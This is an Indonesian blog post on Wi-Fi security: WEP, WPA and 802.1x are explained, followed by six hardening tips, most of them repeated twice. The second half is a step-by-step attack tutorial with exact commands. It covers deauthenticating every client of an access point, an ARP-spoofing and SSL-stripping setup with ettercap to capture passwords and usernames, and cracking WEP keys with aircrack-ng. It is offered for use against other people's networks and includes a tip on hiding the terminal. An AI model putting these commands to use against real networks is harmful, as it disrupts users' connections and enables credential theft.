WEP
Teknik pengaman jaringan wireless yang satu ini merupakan kepanjangan dari Wired Equivalent Privacy. WEP menggunakan sistem enkripsi untuk memproteksi pengguna WLAN dalam level yang paling dasar. WEP memungkinkan administrator jaringan wireless membuat encription key yang akan digunakan untuk mengenkripsi data sebelum dikirimkan melalui jalan udara. Encription key ini biasanya dibuat dari 64 bit key awal dan dipadukan dengan algoritma enkripsi RC4. Ketika fasilitas WEP diaktifkan, maka semua perangkat wireless (AP dan client) yang ada di jaringan harus dikonfigurasi dengan menggunakan key yang sama. Hak akses dari seseorang atau sebuah perangkat akan ditolak jika key yang dimasukkan tidak sama.
WI-FI Protected Access atau disingkat dengan istilah WPA
merupakan teknik pengaman jaringan wireless LAN yang diklaim lebih canggih dari WEP. Dengan disertai teknik enkripsi yang lebih advanced dan tambahan pengaman berupa otentikasi dari penggunanya, maka WPA akan jauh lebih hebat mengamankan Anda pengguna WLAN.
802.1x
Teknik pengaman yang satu ini akan mengharuskan semua pengguna jaringan wireless untuk melakukan proses otentikasi terlebih dahulu sebelum dapat bergabung dalam jaringan. Sistem otentikasinya dapat dilakukan dengan banyak cara, namun sistem otentikasi menggunakan pertukaran key secara dinamik. Sistem pertukaran key secara dinamik ini dapat dibuat dengan menggunakan Extensible Authentication Protocol (EAP).
dengan kata lain tingkat keamanan terendah suatu jaringan wifi adalah jika menggunakan password WEP. Dan ada juga beberapa yang perlu di perhatikan dalam menggunakan atau membuat jaringan wifi seperti dibawah ini:
6 Langkah Pengamanan Dasar Jaringan :
1. Ubahlah Sistem ID (Identitas)
Biasanya suatu layanan nirkabel dilengkapi dengan suatu standart pengamanan identitas atau yang sering disebut SSID (Service Set Identifier) or ESSID (Extended Service Set Identifier). Sangat mudah bagi seorang hacker untuk mencari tahu identitas default dari suatu layanan atau jaringan, jadi sebaiknya Anda segera mengubahnya menjadi suatu identitas yang unik, yang tidak mudah ditebak orang lain.
1. Ubahlah Sistem ID (Identitas)
Biasanya suatu layanan nirkabel dilengkapi dengan suatu standart pengamanan identitas atau yang sering disebut SSID (Service Set Identifier) or ESSID (Extended Service Set Identifier). Sangat mudah bagi seorang hacker untuk mencari tahu identitas default dari suatu layanan atau jaringan, jadi sebaiknya Anda segera mengubahnya menjadi suatu identitas yang unik, yang tidak mudah ditebak orang lain.
2. Mematikan identitas pemancar
Dengan mengumumkan kepada umum bahwa Anda memiliki suatu jaringan nirkabel akan membuat para hacker penasaran untuk membobol jaringan nirkabel Anda. Mempunyai suatu jaringan nirkabel bukan berarti harus memberitahukannya kepada semua orang. Periksalah secara manual perangkat keras yang Anda pakai untuk jaringan nirkabel tersebut, dan pelajarilah bagaimana cara mematikannya.
Dengan mengumumkan kepada umum bahwa Anda memiliki suatu jaringan nirkabel akan membuat para hacker penasaran untuk membobol jaringan nirkabel Anda. Mempunyai suatu jaringan nirkabel bukan berarti harus memberitahukannya kepada semua orang. Periksalah secara manual perangkat keras yang Anda pakai untuk jaringan nirkabel tersebut, dan pelajarilah bagaimana cara mematikannya.
3. Sediakanlah enkripsi
WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access) dapat meng-enkripsi data Anda sehingga hanya penerima saja yang diharapkan dapat membaca data tersebut. WEP (Wired Equivalent Privacy) mempunyai banyak kelemahan yang membuatnya mudah disusupi. Kunci 128-bit hanya mempunyai tingkat pencapaian yang relatif rendah tanpa peningkatan keamanan yang signifikan, sedangkan untuk 40-bit atau 64-bit pada beberapa perlengkapan lainnya, mempunyai enkripsi yang sama baiknya. Dengan cara pengamanan yang standart saja pastilah tetap akan mudah bagi hacker untuk menyusup, namun dengan cara enkripsi ini pastilah akan membuat jaringan Anda lebih aman dari hacker. Jika memungkinkan, ada baiknya untuk menggunakan enkripsi WPA (peralatan yang lebih tua dapat diupgrade terlebih dahulu agar compatible dengan WPA). WPA dapat sangat menjanjikan dalam menjamin keamanan jaringan nirkabel Anda, namun masih tetap dapat dikalahkan oleh serangan DOS (denial of services).
WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access) dapat meng-enkripsi data Anda sehingga hanya penerima saja yang diharapkan dapat membaca data tersebut. WEP (Wired Equivalent Privacy) mempunyai banyak kelemahan yang membuatnya mudah disusupi. Kunci 128-bit hanya mempunyai tingkat pencapaian yang relatif rendah tanpa peningkatan keamanan yang signifikan, sedangkan untuk 40-bit atau 64-bit pada beberapa perlengkapan lainnya, mempunyai enkripsi yang sama baiknya. Dengan cara pengamanan yang standart saja pastilah tetap akan mudah bagi hacker untuk menyusup, namun dengan cara enkripsi ini pastilah akan membuat jaringan Anda lebih aman dari hacker. Jika memungkinkan, ada baiknya untuk menggunakan enkripsi WPA (peralatan yang lebih tua dapat diupgrade terlebih dahulu agar compatible dengan WPA). WPA dapat sangat menjanjikan dalam menjamin keamanan jaringan nirkabel Anda, namun masih tetap dapat dikalahkan oleh serangan DOS (denial of services).
4. Membatasi dari penggunaan traffic yang tidak perlu
Banyak router jaringan kabel maupun nirkabel yang dilengkapi firewalls. Bukan bermaksud mengedepankan firewalls, namun firewalls telah membantu dalam pertahanan keamanan jaringan. Bacalah petunjuk manual dari perangkat keras Anda dan pelajarilah cara pengaturan konfigurasi router Anda, sehingga hanya traffic yang sudah seijin Anda saja yang dapat dijalankan.
Banyak router jaringan kabel maupun nirkabel yang dilengkapi firewalls. Bukan bermaksud mengedepankan firewalls, namun firewalls telah membantu dalam pertahanan keamanan jaringan. Bacalah petunjuk manual dari perangkat keras Anda dan pelajarilah cara pengaturan konfigurasi router Anda, sehingga hanya traffic yang sudah seijin Anda saja yang dapat dijalankan.
5. Ubahlah 'kata sandi' default Administrator milik Anda
Hal ini baik untuk semua penggunaan perangkat keras maupun perangkat lunak. Kata sandi default sangat mudah disalahgunakan, terutama oleh para hacker. Oleh karena itu sebaiknya ubahlah kata sandi Anda, hindari penggunaan kata dari hal-hal pribadi Anda yang mudah diketahui orang, seperti nama belakang, tanggal lahir, dan sebagainya.
Hal ini baik untuk semua penggunaan perangkat keras maupun perangkat lunak. Kata sandi default sangat mudah disalahgunakan, terutama oleh para hacker. Oleh karena itu sebaiknya ubahlah kata sandi Anda, hindari penggunaan kata dari hal-hal pribadi Anda yang mudah diketahui orang, seperti nama belakang, tanggal lahir, dan sebagainya.
6. Kunci dan lindungilah komputer Anda
Hal ini merupakan cara pengamanan terakhir untuk komputer Anda. Gunakanlah firewall, perangkat lunak Anti Virus, Zone Alarm, dan lain sebagainya. Setidaknya setiap satu minggu perbaharuilah Anti Virus yang Anda pakai.
Hal ini merupakan cara pengamanan terakhir untuk komputer Anda. Gunakanlah firewall, perangkat lunak Anti Virus, Zone Alarm, dan lain sebagainya. Setidaknya setiap satu minggu perbaharuilah Anti Virus yang Anda pakai.
dan ada beberapa teknik hacking pada jaringan wi-fi (mohon maaf kalo masih ada yang salah stepnya, masih butuh bimbingan)
1.deautenfikasi
2.spoofing
3.wep crack
untuk yang pertama saya ingin menjelaskan langkah-langkah deautenfikasi, ini bertugas untuk mengirimkan paket terus menerus sehingga target menjadi lambat berkoneksi dan akan terputus dari koneksi jika terus menerus di beri paket.
deautenfikasi
1. buka backtrack (usahakan pakai leptop yang cocok dengan backtrack, suka ada yang masih butuh konfigurasi-konfigurasi khusus yang ribet dan saya kurang mengerti)
2.lalu buka terminal taw untuk lebih aman biar tidak kelihatan orang pakai yakuake
3.buat device baru dengan mode monitor dengan menuliskan airmon-ng start wlan0
4.search koneksi wifi dan pengguna wifi lain yang dapat di terima oleh leptop anda dengan cara airodump-ng mon0
5. kita bisa memfokuskan pada 1 AP(akes point) dengan cara menuliskan airodump-ng -c 1 --bssid aa:bb:cc:dd:ee:ff mon0 yang maksudnya ialah memfokuskan pada Ap yang memiliki channel 1 dan bssidnya aa:bb:cc:dd:ee:ff menggunakan device mon0
6.setelah itu saatnya kita mengirim paket ke semua user pengguna AP tersebut, dengan cara aireplay-ng -0 5 -a aa:bb:cc:dd:ee:ff -c ff:ff:ff:ff:ff:ff mon0 ini maksudnya ialah mengirimkan tipe deautenfikasi sebanyak 5 x kepada AP aa:bb:cc:dd:ee:ff dan diberikan kepada semua user pengguna AP tersebut
selesai dan semua user akan terdisconnect dari AP
spoofing
1.buka terminal taw yakuake
2. koneksikan dengan AP yang ingin di spoof
3.ketikan pada terminal echo 1 > /proc/sys/net/ipv4/ip_forward yang bertujuan untuk mengaktivkan ip forward
4.kemudian ketik cat /proc/sys/net/ipv4/ip_forward untuk mengecek apakan nilai ip forward sudah sama dengan 1, jika sudah maka lakukan langkah ke 5
5.kemudian kita ketikan ini, iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000 (untuk membuat ip table)
6. kemudian sslstrip -a -f -k untuk mengaktifkan sslstrip lalu arpspoof -i eth0 -t [ip target] [routers] untuk melakukan arp dan ettercap -T -q -i eth0 untuk membaca password dan username yang lewat pada jaringan wifi tersebut. ketiga perintah tersebut di ketikan pada 3 terminal berbeda dan di enter secara bersamaan.
dan kita telah melakukan spoofing pada suatu target.
wep crack
1.buka terminal
2.buat device menggunakan airmon-ng
4.kemudian ketik airodump-ng --channel [num] --write [nama_file] [interface] untuk membuat file berdasarkan channel yang dimaksud.
5.lakukan perintah deautensifikasi pada terminal lain
6.pada terminal lain juga lakukan aircrack-ng -z [nama_file]-01.cap -b [mac_AP] untuk membuat sebuah capture dan mengcrack password yang nanti akan muncul di terminal
untuk WEP saya sudah pernah berhasil, tapi katanya juga bisa untuk WPA tapi saya belum pernah mencobanya.
Tidak ada komentar:
Posting Komentar